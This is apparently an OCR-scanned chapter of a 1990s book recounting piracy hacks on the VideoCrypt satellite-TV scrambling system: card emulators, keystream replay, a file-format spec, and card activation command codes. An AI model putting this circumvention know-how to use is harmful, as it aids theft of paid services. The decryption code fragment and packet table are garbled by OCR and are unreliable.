It was just like bugging a telephone conversation. You take the data flowing 
between the smart card and the decoder and transmit it around an area. 
Each of the other decoders has a small radio receiver inserted in the smart 
card socket. The card is virtually inserted in each decoder and each 
decoder then proceeds to decode the channel. The theory was tested by 
connecting two decoders with three wires; a ground wire, the data wire and 
a reset wire. It worked. 
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It blew the credibility of VideoCrypt to pieces but the hacks that followed 
were even more devastating as they had more commercial applications. 
With those hacks, pirate smart cards became available and the McCormac 
Hack as it stood then was not exactly relevant. 


With the lack of a pirate 10 card, the theory has been dusted off and 
examined in the light of a relatively new development - the Internet. It could 
be that the main problem of seed distribution has been solved. It may just 
be possible to have one official smart card hooked up decoding a channel 
and with the dataflow being monitored and broadcast over the internet. 


The primary difference between the 1989 version of the hack is that the 
internet is used to route the seed keys. The original theory had a radio 
connection for distribution. There is apparently a radio based version of the 
hack in operation in Spain on an MMDS network. 


In the 1996 version, the theory is that the dataflow between a legitimate 
smart card and a decoder will be monitored via a Season type interface. 
The PC would then rebroadcast the keys via the internet to a number of 
satellite PCs. The satellite PCs would have their own Season type interface 
which would be hooked into a decoder or IRD running on the same channel 
as the master. 


Of course the disadvantage is that only one channel can be handled at any 
given time. It would be possible for the same kind of setup to be duplicated 
for each channel. As a result all of the premium channels could be hacked. 


In order to run such an operation, a multitasking operating system would be 
required by the PC. This rules out DOS and Windows. The ideal candidate 
for this type of operation is Linux. 


The most critical aspect of such a hack would be the routing time between 
the server PC and the satellite PCs. If this is too great then the seed will not 
arrive in time. The time taken for routing can easily be established with a 
TRACEROUTE command. 


The present state of the internet precludes such a hack running on a 
transnational basis. The internet is just not fast enough. Even in Ireland, the 
routing between some of the internet service provider is not exactly brilliant. 
It took hops across the UK and the United States to get from one ISP to 
another. Geographically, these ISPs were only a few miles away. 


A more viable possibility, especially where there is a low cost local phone 
rate, (ie not Ireland), would be a pseudo-BBS approach to the problem. A 
BBS can handle a number of simultaneous connections at once. Therefore 
by using a SEASON setup feeding the BBS each dial-up port would be able 
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to feed another computer running a SEASON interface on one serial port 
and a modem on the other. The application could be written under DOS 
though the server would be better under Linux or Unix. 


The main traffic on the link would be the seeds and the ZKT tests. However 
it might be possible for News Datacom to make the 74 packets interdepend- 
ent and perhaps to tighten up the timing. This is similar to some of the 
modifications made with the VideoCrypt-ll system. However the bulk of the 
programming is transmitted via VideoCrypt-1. This system is flawed as the 
decoder does not have a box ID number although it was part of the initial 
specification. 


The main question about these formats of hack is the cost. Would it be 
reasonable to have a leased line connection just to watch the Sky premium 
channels? The answer is a resounding no. There are cheaper methods. 
However if it is only going to be used for premium programmes such as the 
Simpsons and Star Trek Voyager then it becomes feasible. Of course the 
main and most devastating application for this hack is Pay Per View events. 


In Europe, Sky has not risked screening any real PPV events. The first 
potential PPV event that Sky may screen in 1996 was the Bruno Vs Tyson 
Boxing Match. That was hacked and it was possible to upgrade cards with a 
Phoenix program. The venture was not exactly a resounding success as it 
was aired around 0500 Hrs. As a result it was not exactly primetime viewing 
in Europe. It was also available on the totally hacked TV1000 channel. 


Of course with the planned introduction of PPV in the next twelve months, 
the possibility of a McCormac Hack is a very real threat to VideoCrypt. 


The situation is different with DirecTv DSS in that there are PPV channels 
already in operation. The DirecTv system has a working box serial number 
system but this seems easy enough to bypass. 
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The 07 Ho Lee Fook Hack 


There is no such thing as coincidence or is there? On the day in 1993 that 
the film “Sneakers” was released on video | received an actual working hack 
for the scrambled Sky channels. The film "Sneakers" is about events 
surrounding a piece of equipment that can hack any cryptosystem. The 
piece of equipment that | received was essentially a chip that hacked the 
BSkyB VideoCrypt channels 


The hack on the VideoCrypt system was labeled the “Ho Lee Fook” hack. 
The reason for this name is more to do with people’s reaction to the hack 
rather than its origin. Very few people are sure as to where exactly the hack 
originated and those who are sure are not speaking. 


The VideoCrypt system is the mainstay of the BSkyB satellite television 
empire. It is the means by which BSkyB makes its money from the 
subscribers. The basic theory is that they pay a subscription and they 
receive a smart card. This smart card, when inserted into the VideoCrypt 
decoder will allow the decoder to descramble the channels paid for. It is also 
possible for BSkyB to turn off the cards of those subscribers who have not 
paid. 


Other channels using the VideoCrypt system were hit. The Adult Channel, 
JSTV and TV Asia were compromised as well. This meant that all of the 
channels using the VideoCrypt system as a fee gathering system lost 
control of the market in one fell swoop. 


This was to that point perhaps the most dangerous hack to have occurred 
on VideoCrypt. In effect it was a new smart card that gave access to all the 
Sky channels. Of course the problem for Sky was that it was not a genuine 
Sky card. 


The pirate smart card was approximately sixteen millimetres longer than the 
official Sky card. It is a blue printed circuit with a single surface mount chip. 
There were five connector pads. 


The standard check for a card of this nature is to look for a wafer from an 
official smart card. In the early days, a fairly common scam was to take the 
chip and connector pad from a valid Sky card, trim away the plastic and then 
put the chip in a DIL header. The DIL header would then be blobbed in a 
lump of black resin so that it looked like an IC. 


The chip on the PCB was the real thing. There was no wafer underneath the 
body of the chip. The actual stubs of the chip die were just visible at the end 
of the chip. The chip was a PIC16C54. This was the EPROM version of the 
now commonplace PIC16C84. 
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Actually there were two different versions of the 07 Ho Lee Fook hack. The 
card version was the later one. The first version was a replacement for the 
8052 in the decoder. The official VideoCrypt name for the 8052 chip in the 
decoder is “The Verifier’. This chip had to be removed and replaced with the 
Ho Lee Fook 8752 chip. The decoder then decoded the scrambled 
channels without the need for the BSkyB smart card. This was the exactly 
the thing that people had said could never happen - a cardless Sky decoder. 


If it had been a direct clone, Sky would have been able to kill it over the air 
or would they? They were not able to kill the Ho Lee Fook cards by 
neutralising a specific card identity - the pirate smart cards had no card 
identity numbers. When they were reset, they returned a string of zeroes as 
their identity number. 


There were of course more devastating implications here. The card only 
contained the data and algorithms necessary to descramble the signals. 


A card that only contained enough information to descramble the signal 
would reduced VideoCrypt to the status of a system like SAVE. More than a 
few hackers were laughing as a result. The arrogance of News Datacom 
only inspired hackers. Here were these people with their new system 
making out that they were better than all who had come before them and 
indeed all that stood before them. Obviously they, having inhabited the 
sterile environment of a laboratory for too long, did not realise that the 
mindpower employed to hack the system was far greater than that 
employed to design the system. 


The much vaunted Fiat Shamir Zero Knowledge Test was nowhere to be 
seen. If the ZKT had indeed been implemented properly then all of these 
pirate cards would have been knocked out. 


According to the early theory on VideoCrypt, the smart card had to 
authenticate itself to the decoder and prove it was a genuine smart card. 
This was apparently just a load of waffle. If it was not then the Ho Lee Fook 
would definitely have been knocked out as it only held the hash function and 
key tables. The real answer to the question is that the ZKT implementation 
in the early models of the VideoCrypt decoders was flawed. As a result the 
ZKT would be ignored which is exactly the result that Sky and News 
Datacom did not want. 


The 07 Ho Lee Fook lasted from April 1993 to 18th May 1994. News 
Datacom tried to implement every electronic countermeasure that they 
could. The hackers defeated every one of them, typically within a few 
minutes. In the end News Datacom were left with little alternative other than 
a new smart card. When they introduced this new smart card it was hacked 
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roughly a month after its introduction. This was the famous Dorchester 
Code. News Datacom knocked out this hack a week after this hack hit the 
market. It was not until November 1994 that working pirate 09 cards 
became widely available. 


VideoCrypt seems to be locked into a hack - intact - hack pattern. This 
pattern has been has been seen in hacks on other scrambling systems. The 
VideoCipher II system is one that immediately springs to mind. 


The VideoCipher II system was billed as the most secure system yet 
devised. Within a few months, hackers had discovered that the decoder 
could be fooled into allowing access to all channels having only paid for one. 
This was the EPROM hack or as it was know the Musketeer hack. The 
parallel with Sky would be the Zener diode or Infinite Lives hack. 
VideoCipher ІІ is now in its third incarnation. VideoCrypt will go through а 
similar set of incarnations until it is replaced by a Digital Television system. 


When VideoCrypt was launched, there was only a stand alone decoder for 
the system. The decoder was only supposed to have been used in the UK 
or Ireland. Of course this was a naieve assumption. These decoders were 
being shipped out to mainland Europe by the truck load. 


The biggest mistake made by BSkyB and perhaps News Datacom was 
letting the decoders be integrated with receivers. This produced the IRD. It 
is a lot simpler to ship an IRD than a decoder. Whereas the decoder would 
be listed as such on Customs and Excise documentation, the IRD would 
only be listed as a receiver. 


Every so often the press would be bombarded by press releases claiming 
that BSkyB in conjunction with the UK Customs had prevented yet another 
truck load of decoders from reaching Europe. It was a particularly dull 
period in BSkyB's history considering that anyone in mainland Europe who 
wanted a VideoCrypt decoder could get one without any real problems. 


This new hack could not have occurred at a worse time for BSkyB. It was 
busy trying to persuade new channels to come on to its low pay tier which 
launched in the September 1993. 


The Adult Channel was the most vulnerable in all of this fiasco. The fact that 
they are marketing the smart cards on a yearly basis would imply that 
upgrading the cards would be a heavy financial burden. They are now totally 
hacked as the 96 byte key table is available on many BBSes throughout 
Europe. Only minor ECMs have been seen on this channel. It seems that 
they are not too worried about piracy. But then given that most people would 
rather watch the uncut porn on FilmNet or TV1000, this channel does not 
have such a great audience. 
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The issue of new card batches for BSkyB channels occurs mainly in Spring 
or Autumn. A Summer launch of the new 08 cards would be have been 
unusual. Indeed the 08 card design had to be junked as it probably was little 
more than a change of code tables. BSkyB were eventually forced to issue 
an 09 card in February 1994. This was at least six months ahead of their 
own schedule. 


The philosophy of VideoCrypt is that of the detachable secure controller. 
Basically what this means is that if the system is hacked then all that needs 
to be done to stop the hack is to issue a new card. 


The effects on the confidence of present and prospective users of 
VideoCrypt is more difficult to gauge. The smart card is the core of the 
VideoCrypt system. Seeing it replaced by a pirate smart card contradicts 
every claim made in favour of VideoCrypt. It was not supposed to be 
possible. One thing is certain, channels will now have to look at a 
scrambling system as only being a temporary form of protection that has to 
be frequently updated. 


The source code for the PIC16C84 hacks on VideoCrypt is widely available 
on the internet and BBSes. While it is now obsolete on the Sky channels, it 
is still being used by the Adult Channel and their hardcore version, Eurotica. 
The WWW and FTP sites referred to in Chapter 5 carry the most current 
versions of this PIC code. 


The 07 OMIGOD Hack 


Well after the Ho Lee fook, the OmiGod was the logical progression. The 
OmiGod, (pronounced Oh My God), was a PC Emulator for VideoCrypt. The 
program is public domain software. The name of the hack is SEASON7. 
The SEASON intended to be a reference to the seventh season of Star 
Trek - The Next Generation. Many hackers have referred to the hack as the 
OMIGOD hack. The now commonplace name for this type of hack is a 
SEASON hack. 


This hack allowed the PC or indeed many other computers to emulate an 
official 07 Sky card. The PC was connected to the VideoCrypt decoder's 
card slot by means of an interface. It was the ultimate insult for News 
Datacom - computer hobbyists were able to run the hacks on their home 
computers. There were versions for the BBC Archimedes and the Apple 
Mac computers as well. 


The program was created for use outside of the UK. The reason for its 
creation is Star Trek. Apparently Sky has refused to provide subscriptions 
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outside of its own copyright area. The direct result of this has been to irritate 
those who would honestly subscribe, if they were allowed to. 


When the program was released it spread like wildfire. The method of 
release was similar to that of shareware. The Usenet and the bulletin 
boards ensured that it covered Europe in a matter of a few hours. Though 
its use in the UK was of grey area legality, there was no possible way of 
stopping its distribution in the UK. Sky and News Datacom could not close 
down every international telephone line and neither can they close down 
every UK BBS. 


There were some rumours that the program would be released via the 
Delphi system in the USA. This internet system apparently was bought by 
Rupert Murdoch some time ago. If this had happened it would have been an 
elegant hack. 


The interface is a very simple circuit consisting of a MAX232 and a 74LS07. 
The MAX232 converts the levels between RS232 and TTL and the 74LS07 
is an open collector buffer. The MAX232 generates the two positive and 
negative RS232 voltages internally. This means that the card power supply 
line from the decoder can drive the interface directly. 


The interface can be constructed on a printed circuit board or a piece of 
stripboard. The main disadvantage for some people will be the connection 
of the interface to the decoder. The most logical method would be via the 
card socket. The problem is that a dummy smart card would have to be 
etched. 


The standard fibreglass printed circuit board material is 1.6 millimetres 
thick. The thickness of the smart card is roughly half of this. Where PCB 
material of the correct thickness was not available, it was common to sand 
down a 1.6 mm piece of PCB. The etching would be carried out first. The 
resultant PCB would be longer than the official smart card. Some people 
have suggested using the defunct pirate cards instead. 


The direct connection of the interface to the decoder is also possible. The 
only connections to the decoder are the data line, the 5 Volt Vcc line, 
Ground and RESET. This is of course a risky option for those unfamiliar 
with the circuitry. 


This hack had the effect of creating a sub-industry of interface sellers. 
Some of the better interfaces are detailed in Chapter 4. It also laid the 
foundations for the 09 Season programs and the D2-MAC EuroCrypt 
season programs. 
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Delayed Data Transfer 


The DDT hack is currently the most reliable hack on the VideoCrypt system. 
Indeed it should work on any implementation of the VideoCrypt across the 
planet. 


The letters DDT stand for Delayed Data Transfer or Transmission. However 
the effect on VideoCrypt would be similar to the pesticide of the same 
name. 


The flaw that allows this hack to work is that the data rate of the control 
packets on the VideoCrypt system is approximately 1 kilobaud. This data 
rate is slow enough to allow the signal to be recorded on a standard video 
tape recorder. Of course there are some VCRs that do not record the VBI 
lines that carry the data. 


The principle of the hack is that the key stream from a valid card can be 
recorded and stored. This keystream can then be played back to a decoder 
that is being fed with a scrambled recording of the programme that the 
keystream was made for. The decoder will decode the scrambled signal as 
the keystream is played back as if it was a that from a valid smart card. 


The keystreams for various programmes have already been posted on 
various BBSes and FTP sites. Mainly these streams have been for “Star 
Trek:Voyager’, “The X-Files", “Space: Above And Beyond” and “Deep 
Space 9”. Movies are not so much the main target of this hack as the cult 
series. 


Some people have commented that this hack is not really a true hack. | 
would disagree with this. It is a very elegant hack and, most importantly, it 
works. 


Perhaps the effective use of this hack will be in the area of Pay Per View. 
Normally when PPV is considered, the programming is thought of in terms 
of such as concerts or sporting events. While these do form part of a PPV 
channel, the real attraction is in first run movies. This is exactly the type of 
programming at which the hack excels. 


All of the 09 SEASON programs have the DDT code incorporated so that 
they can be used for this hack. It is then a question of obtaining the VCL 
files from either the ftp.informatik.uni-erlangen.de FTP site or from some of 
the satellite television BBSes around Europe. 


There have been some modified versions of the DDT hack. One of the 
more elegant of these has been the VBL 
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Official Specification For The VCL File Format 


The essential data for decoding the scrambled VideoCrypt signal is the 
74h/78h pair. These are the message block and the key packets respec- 
tively. Much of the rest of the data traffic is card authorisation and 
deauthorisation data. 


The VCL format uses this redundancy to save storage space. Only 12 bytes 
of high entropy (that means: almost uncompressable) are stored every 2.5 
seconds. Therefore a VCL file of a 1 hour programme is only about 17 
kilobytes large. In addition, VCL files do not contain information about the 
card owner (especially the card serial number), which appears in normal full 
log files in the 70h and 7Ch packets. (The only potential security hole is the 
remaining nibble in the 78h key packet. Consequently it should be cleared in 
order to avoid card specific information to leak into the VCL file.) 


VCL files have a very simple binary format consisting of a 128 byte header 
and a specified number of 12 byte records. At the end, VCL files may be 
padded with zero bytes to a multiple of the operating system's disk sector 
size, so that no RAM contents can leak into the file out of an insecure 
system like MS-DOS. Don't forget to use a binary mode if you transfer VCL 
files or their contents will be rendered unusable. 


The 128 Byte VCL File Header Format 
Bytes 0 - 3 
ASCII String " VCL1' which identifies the file type and version of the format. 
Bytes 4 - 7 
The number of 12-byte records stored in this file encoded as a bigendian 
(most significant byte first) 32-bit unsigned integer value. 
Bytes 8 - 23 
Date and time when the recording started. Format: yyyymmddThhmmsszZ, 
where yyyymmdd are year, month and day (e.g. 19940618”), hhmmss аге 
hour, minute and second (e.g. 235959?) T is just the ASCII letter T, and Z 


is the ASCII letter Z if the time is UTC or a zero byte, if the time is local time. 
The digits are ASCII characters. 


Bytes 24 - 55 


Name of the satellite or cable system from which the recording was done. 
This is a zero terminated ASCII string with only characters between 20h and 
7Eh. As many zero bytes are appended as necessary for filling up the 32 
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bytes. The same format is also used for the next two text fields. Example: 
‘Astra’. 


Bytes 56 - 63 


Name/number of the transponder from which the recording was done. 
Example: "08: for Sky One on Astra. 


Bytes 64 -127 


Description of what has been recorded. Example: “Star Trek: ТМО, episode 
123 


The first 128 bytes are followed by as many 12 byte records that аге 
specified in bytes 4-7. Each record represents a 74h/78h Videocrypt 
protocol pair and consists of two fields: The first 4 bytes are the final 4 bytes 
of the 74h message packet part, the remaining 8 bytes are the data part of 
the corresponding 78h key packet. Four bytes of each 74h packet are 
enough to allow a card emulator to quickly and reliably synchronize with the 
queries of the decoder. The final four bytes of the 74h commands һауе 
been selected because of their high entropy (signature and checksum). 


DDT - The 09 Version 


The Video Broadcast Log, VBL, is an enhancement of the DDT log format. It 
differs from the DDT in that it allows for a more reliable method of providing 
the VCL file. The VCL file as per the original specification was effectively a 
publication of the correct key responses for the 74h packets. 


With VBL, the initial file is a record of traffic between an INVALID card and 
the decoder for the required television programme. The user, person A will 
record this file on his PC and of course the encrypted television programme 
on video. 


This data log made with the invalid card is then passed to someone with a 
VALID card, person B, who will then make a VCL file with the correct 
responses in place of the bad ones from the VBL data log. The corrected 
file can then be returned to person A. 


The security of this scheme lies in the trust between the two parties. Should 
the legal framework about posting VCL files in public change, then this is an 
excellent alternative. 


At the moment the only use of the DDT and VBL hack is for people outside 
the copyright area. Sky will not sell these people a legitimate subscription 
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and these people only want to watch the cult series on Sky One such as 
"Star Trek: DS9", "The X Files" etc. Movies as such do not seem to be a 
target of this hack. 


The usage of this hack also seems to be of a particularly low level. This can 
be attributed to two factors: better programmes on other channels and the 
complexity of the hack. 


The hack requires the VCR to be connected initially to the satellite receiver 
and then to the decoder. The playback quality of some VCRs is not good 
enough to allow proper decoding. However on many it works well enough. 
The video quality of the decoded picture is not exactly broadcast quality. Of 
course if you are dedicated to watching the "X Files" or "Star Trek: 059" 
such things do not matter much. 


The 07 to 09 Transition 


The security of Sky's 07 card was a joke. Everyone had the code and there 
was very little that Sky could do about it. Indeed some hacker estimates put 
the number of pirate 07 devices at about 500,000 in the UK. This was ten 
times that estimated by Sky later in a court case in 1994. It was just not 
economically feasible to for Sky to prosecute all the people that they 
suspected of hacking their service in the UK. They also admitted that in the 
same affidavit. 


Perhaps Sky could have tried to implement some of the ECMs that the 07 
Sky card was capable of. However things pointed to the fact that the 
complete code from the 07 card had been popped. Even though most 
hackers knew what Sky was using was effectively the bare minimum with 
some key table changes. They could have made the code and algorithm a 
lot more processor dependant. 


The satellite press was beginning to question the expertise and strategy of 
Sky. Most of the magazines were flooded with advertisements for pirate 
cards. Even the Uk magazines were carrying advertisements for the pirate 
Sky cards. Sky were doing a corporate impression of an ostrich, ignoring 
questions. 


The reality of the situation was beginning to tell on Sky. They could no 
longer evade the problem and they switched to their new smart cards - 
issue 09. They had been sending these cards out since February but on 
May 18th 1994, the pirates cards ceased to operate. The SEASONO7 
program stopped working. Sky had, or so they thought, won the war. The 
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fun had only just begun. The day became known as Dark Wednesday - the 
days the Skys went black. 


In the aftermath, the pirates and hackers were reeling. Some of the more 
vociferous ones had disappeared almost overnight. The sounds of angry 
customers may have had a lot to do with it. Some of the more optimistic 
dealers were promising that they would have the new codes really soon, 
perhaps in a few weeks. 


The pirate market had collapsed only a month or so earlier. The pirate 07 
cards were being sold for less than forty pounds. The SEASONO7 program 
had spread all over Europe and was available for most computers. 


Sky were overjoyed. They had scored a major victory. It was the only time 
that they had effectively nuked the whole industry. Roughly a month later, 
Sky had little reason to be joyful. 


The Dorchester Code 


On June 20th 1994 there was an auction at the Dorchester Hotel in London. 
On auction was the 09 Sky code. The asking price was over £300,000. 
Apparently some of the code was sold because within a matter of hours, the 
pirate cards were going back into operation throughout Europe. In the UK, it 
was an utter disaster for Sky as people were lining up to have their old 07 
pirate smart cards turned into pirate 09 smart cards. Some reports had 
pirates sitting in pubs with laptops and lines of eager punters, their pint in 
one hand and their card in the other queuing for the upgrade. 


The new code fragment was small enough to fit into the memory of a 
PIC16C84. It a considerable change from the 07 algorithm but it was not so 
different that it could not be emulated on the PIC. The fact that this 
algorithm used multiplication was a sign of things to come. 


The algorithm as used in the Dorchester Code and subsequently in the 
main implementation of the 09 algorithm is examined in detail in Chapter 6. 
However there are many unanswered questions about the origin of this 
code. Some sources considered that the point of origin was within News 
Datacom itself. 


Given that News Datacom have filed a suit against eleven defendants, 
some of whom worked for News Datacom, alleging that they conspired to 
over charge for smart cards, it is plain to see where this idea came from. If 
these people allegedly would screw what was in effect their employer, would 
they sell out the code to the pirates as well? The answer seems to be no. 
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The individuals named in the suit do not seem to be pirates, just business 
people. 


The documented code fragment that was given to illustrate the provenance 
of the Dorchester Code seemed to tend more towards a genuine hack of 
the official card rather than a lifting of some internal News Datacom 
documentation. 


The Dorchester code only lasted about a week. Sky were only using a 
transitional version of the 09 algorithm. This meant that the simple 
implementation of the 09 algorithm in the PIC16C84 would work. Then Sky 
ECMed the Dorchester code. The pirate market was in tatters. Some of the 
pirate dealers in the UK had to go into hiding. Others went off on a search 
for the new codes. It was as futile as a quest for the Holy Grail and these 
pirates did not exactly meet the standards of purity required. The fiasco that 
ensued must have cheered Sky up. After a year of abject piracy they were 
getting their own back on the pirates. The pirates were almost self- 
destructing in the effort to get the new code. Some hackers were close to 
nervous breakdowns trying to crack the new code by cryptographic means. 


Two pirates flew down to Spain to see the self-appointed number one 
hacker, the same one who had rather incompetently plagiarised version 3 of 
the Black Book. (His self-appointment came as a surprise to the many 
excellent Spanish hackers) It turned out that this guy hadn't a clue about 
cryptography or indeed how to solve the upgrade. 


Needless to say the pirates were less than impressed. The pirates flew back 
and continued their search for the Holy Grail. What followed was a long 
summer of false starts and disgruntled customers. It seemed that Sky was 
winning. 


However the fact that it was easy to obtain a genuine 09 Sky card with false 
details from most television shops in the UK meant that anyone who really 
wanted to watch Sky could do so. It would of course be switched off after 
about two weeks but it was very easy to get a new card. Besides, they could 
always get a D2-MAC card and decoder. 


The Dorchester code made its way to the TV-CRYPT group where it was 
analyzed. The algorithm was an improvement on the 07 algorithm. But there 
was something else. By rewriting the code it was possible to generate a 
correct signature for any packet of data. Now since Sky's VideoCrypt 
system operated on an over the air authorisation procedure perhaps it 
would be possible to switch on cards without the intervention of Sky. 


After some analysis of the logs of over the air data, patterns became clear. 
The card identity number is returned when a card is inserted into a decoder. 
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By phoning Sky and having them turn on some cards over the air, it was 
possible to build up an image of how the authorisation scheme worked. By 
the first week in August, the Phoenix program was created by Markus Kuhn 
posted in the TV-CRYPT. The program was based on the DECOEM.C 
program which allowed the PC to emulate a VideoCrypt decoder and send 
packets to a card via an interface. 

Of course the Phoenix program was an intellectual exercise to see how the 
VideoCrypt system worked. There were a few who saw it differently. They 
sold the program in some cases for thousands of pounds. Sky were about 
to get the shock of their lives. 


The 74h Packet 


The 07 and 09 packets were in a 27-4-1 structure. The first 27 bytes are the 
data bytes, the 4 bytes are the hash signature/checksum and the final 1 byte 
is a Modulo 256 packet checksum. 

In the 09 implementation, the card serial numbers were encrypted with a 
small encryption routine. This extra level of security was to little avail as the 
algorithm was cracked. The algorithm generated a four byte table. Byte 0 of 
this table was EXORed with byte 3 of the 74h packet to get the command. 
Byte 2 of the table is EXORed with Nanocommands 

Itis believed that the VideoCrypt-ll system uses a largely similar algorithm 
though the positions of the input bytes are different. Though the capability of 
а VideoCrypt-ll| Phoenix program exists, there is no incentive for the 
commerical pirates to market such a program as it would involve releasing 
the VideoCrypt-ll code table. 


The relevant code nanocommand decryption algorithm fragment 
xx = 74msg[1] А 74msg[2]; 
XX = (xx>>4) | (xx<<4); 
b = 74msg[2]; 
for (1 = 0; i«4; i++) 
{ 
b = (b<<1) | (b>>7); 
com arr[i] = xx +b; 
Ы-сот arr[i]; 


} 


7-49 


7: Video Manipulative Systems 


VideoCrypt 1 - 74h Packet Structure 


EI 


| 02 | 
|03 
|04) 
| 05] 
| 06) 
| 08 | 
| 09 | 
| 10 | 
|13 | 
|20 | 
|23 | 
| 28 | 
| 29 | 
| 30 | 





Decoder Flags Byte 
Card Age Byte (Month Code) 


Packet Command Byte 


Channel Identifier Byte 


4 Most Significant Bytes Of Card IDs 


The fifth bytes of the card ids addressed in this packet 
follow the four byte root. 


The packet command would identify the packet as a 
turn-on packet, a kill packet or a Nanocommand packet. 


The Packet Command byte value for a Nanocommand 
packet was 80h. This was a change from the original 
specification. In the original specification, the Kill command 
was 00h, a batch kill command was 80h and a turn on 
command was 20h. The 09 card integrated the channel ID 
with the turn-on/kill instructions. This had the effect of 
increasing the bandwidth as packets did not have to be 
transmitted on the relevant channels 


In VideoCrypt-2, Byte 02 is a day code. To derive the 
correct day, the value is ANDed with 1Fh. Byte 03 is the 
tier byte and is also ANDed with 1Fh. Byte 04 is the 
channel ID. Byte 09 is the Packet Command byte. The 
same type of card addressing seems to be in use. 


Hash Function Checksum/signature 


Modulo Packet Checksum 
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Phoenix In Operation 


The central packet of the VideoCrypt system is the 74h packet. This is the 
system's workhorse and it handles the seed data transmission and the card 
addressing tasks. The manner in which it combines both tasks is elegant. 
The complete 74h packet is used by the hash algorithm to generate the key. 


The last five bytes of this packet are the checksums. The last byte is a 
modulo checksum and is a value that is added to the sum of the bytes to 
ensure that the result of the addition is an even multiple of 256. The other 
four bytes are the hash function signature or checksum. If any of these 
bytes are incorrect then the packet will be rejected by the card. The modulo 
checksum is trivial but the hash function checksum requires a valid hash 
algorithm and a valid set of keys. This is not so trivial. 


The weakness of the 09 card was that it only required on valid keytable to 
generate a properly checksummed packet. It did not even have to be the 
keytable in use at the time. The 09 card had a set of keytables that could be 
selected in a similar fashion to the 07. 


The Phoenix Program created a valid 74h packet including the serial 
number of the card to be turned on with the turn on command to activate all 
channels on the card. The model of the Phoenix in operation is simple. 


1. Read The Card Serial Number 

2. Create A Turn-On Packet With That Card’s Serial Number 
3. Send The Turn-On Packet To The Card. 

4. Verify The Card Has Been Turned On. 


Of course the above steps are drastic simplifications. The framework for 
this operation was a program called DECOEM.C This program was written 
by Markus Kuhn to emulate a VideoCrypt decoder. The next step in this 
process was to integrate the routines to read the card serial number and 
encode it within a valid turn-on packet. 


The turn-on packet is merely a packet with the card command byte having a 
value that will turn on a card for a certain channel or group of channels. 
Correspondingly, in a kill or turn-off packet, the command byte has a value 
that will turn off a particular channel or group of channels. 


A fundamental requirement in all of this is to have a valid algorithm and set 
of keys. The basic algorithm and keys was all that was required for this 
operation and the code auctioned at the Dorchester Hotel was used for this. 
Of course it was a serious mistake by News Datacom to allow the basic 
algorithm to be reused. In retrospect it would have been more logical to 


7-51 


7: Video Manipulative Systems 


make sure that once a higher level of the algorithm had been used, the card 
would not respond to simpler implementations. Of course this is easy to say 
now and the 09 smart card code was far more elegant than the previous 
versions. 


The commands that allowed the activation and deactivation of the channels 
are as follows: 

00 Deactivate Whole Card ("Please Call 05%”) 

01 Deactivate Sky Movies 

02 Deactivate Movie Channel 

03 Deactivate Sky Movies Gold 

06 Deactivate Sky Sport 

08 Deactivate TV Asia 

OC Deactivate Multichannels 

20 Activate Whole Card (Remove "Please Call 05%”) 

21 Activate Sky Movies 

22 Activate Movie Channels 

23 Activate Sky Movies Gold 

26 Activate Sky Sport 

28 Activate TV Asia 

2C Activate Multichannels 

40 PPV Account Management 

44 PPV Authorisation 

The last two commands were to do with the PPV events on the Sky 09 card. 
The 44 command was used to activate cards for the Sky Sport special PPV 


event for pubs only. This was Sky's only attempt at PPV during the lifetime 
of the 09 card and it failed due to being overpriced and hacked. 
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The Working Pirate 09 Cards 


It is estimated that over the period between August and November 1994, 
BSkyB lost over 750,000 of their official cards to Genesis activator-blocker 
piracy. They did of course implement ECMs to knock out these missing 
cards. The pirates responded with blocker circuits that looked for the kill 
codes and stopped them. It was definitely a case of history repeating. 
However by October, there was a working pirate 09 smart card. It was the 
end of the security on the 09 card issue. 


Various implementations of the pirate 09 card were surfacing throughout 
October but they generally only worked for a few weeks. The ECMs were 
regularly knocking out these cards. However the information gleaned from 
these ECMs by the pirates was invaluable. The result was a more resilient 
pirate 09 Sky card. 


As with any new hack, the devices went through what could be described as 
a teething process. The first versions of the pirate 09 cards had two 
РІС16С845 and опе 24С65. It was a case of expecting an ECM every two 
or four weeks. When the ECMs occurred, the cards had to be repro- 
grammed but as each ECM was implemented, the knowledge base of the 
hackers and pirates expanded. 


News Datacom had been clever. In fact they had been too clever and as a 
result had left their system open to being compromised. They had made the 
whole address space of the 09 card usable as input data for the hash 
function. This meant that any pirate card had therefore to have a working 
image of the Sky card in memory. In a court case, it would have been very 
easy to prove that the pirate card was a copy. It was a move that could have 
been suggested by a lawyer. 


There were other aspects to this move that were very innovative. The 
nanocommands (covered later in this chapter) gave new life to a subscriber 
management system groaning under the weight of new subscribers. It also 
allowed the cards to be reprogrammed over the air and it was possible to 
incorporate new channels and PPV events. It truly was a work of art. 
However it was flawed. 


Much to the joy of the pirates, the 09 card eventually turned out to be much 
easier to emulate than at first thought. Most of the strongest aspects of the 
09 were left relatively unused by News Datacom. It was a question of 
keeping the system up and running. Therefore as each ECM would 
theoretically knock out a small percentage of legitimate cards, using very 
complex ECMs would probably knock out a larger amount. Considering the 
effect that the Genesis/Phoenix hack was having on the Quickstart smart 
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card reserves, the idea that too many ECMs was probably weighing heavily 
on the minds of those in Sky and News Datacom. Sky were later forced to 
stop the Quickstart scheme due to massive abuse and loss of cards. The 
Quickstart scheme was stopped in early 1995. It was the case that if they 
had not done this, they would have had to introduce the 10 card at least six 
months before they did. 


The 09 Sky card used a Motorola МС68НС055С21 microcontroller. This 
was based оп the MC68HC05C4 microcontroller. There are many theories 
as to how the card was popped but the fact remains that it was. Some of 
these theories relate to the the fact that the pirates had developed methods 
of activating the test mode of the card and dumping out the contents. Other 
related to the nanocommands. In either case, the card was dumped. 


The problem with dumping the code from a card is not so much 
implementing it in a emulation. It is actually understanding the the function 
of each routine. In this particular application, it is a Catch 22 situation. It is 
very difficult to actually understand the function of the routine until you see 
the effect. And by then it is too late because your emulation has been 
knocked out. 


The Rise Of The Battery Card 


The problem of updating the PIC16C84 cards was beginning to affect 
business for the pirates. At best customers could only expect about two to 
four weeks of ECM free operation before having to return the card to the 
dealers. Of course this was a good thing for the dealers as they could 
charge about £5 for the upgrade fee. 


The solution to the problem was the battery card. This was a development 
of some ideas that had been in existence for over ten years. Indeed the 
American influence was clear The idea of using a keypad for updating 
codes and keys had been widely used for the VideoCipher II piracy. 


The European situation was somewhat different to the VideoCipher one. 
With VideoCipher II, the only traffic was an update of the monthly keys. With 
VideoCrypt, it was more complex. Areas of the card image had to be 
modified or indeed the operation of the emulator code had to be modified. It 
was also the first time that this type of update procedure was to be used on 
a smart card. The resulting device was far more advanced than any of the 
official cards. 


The core of the new pirate card, now known as a Battery card, was the 
